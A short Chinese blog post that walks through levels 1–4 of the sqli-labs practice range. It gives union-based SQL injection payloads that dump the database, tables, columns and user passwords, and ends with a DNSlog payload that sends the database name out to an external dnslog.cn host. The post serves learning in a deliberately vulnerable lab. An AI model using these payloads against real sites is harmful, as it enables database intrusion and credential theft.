0%

sqli-labs1

开始sql靶场的学习,

联合查询

Less-1

首先判断注入点的类型

只有单引号出现报错,单引号为注入点。
?id=1'

判断列数

?id=1'order by 4--+(多次猜测可得出有3列)

将1改成不存在数据库的,得出2,3列有回显。

?id=-1' union select 1,2,3--+

爆数据库

?id=-1' union select 1,2,database()--+ 得出security。

爆数据表

?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+

爆user表的列

?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

爆用户名和密码

?id=-1' union select 1,2,group_concat(username,'-',password) from users --+

Less-2

判断类型:为数字注入型。将id=1改成id=-1即可,改成一个不存在数据库的即可。

Less-3

字符型注入。

判断类型:只有输入”回显正常,为注入点。

说明此处为字符型注入,且是以(‘’)的方式闭合字符串的;这里的’ ‘ 不是” “ 。

Less-4

改成”)即可。

—补充使用dnslog注入方法:

使用网址http://dnslog.cn/
输入:
?id=1' and (select load_file(concat('////',database(),'.qcmie7.dnslog.cn/abc')))--+

-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道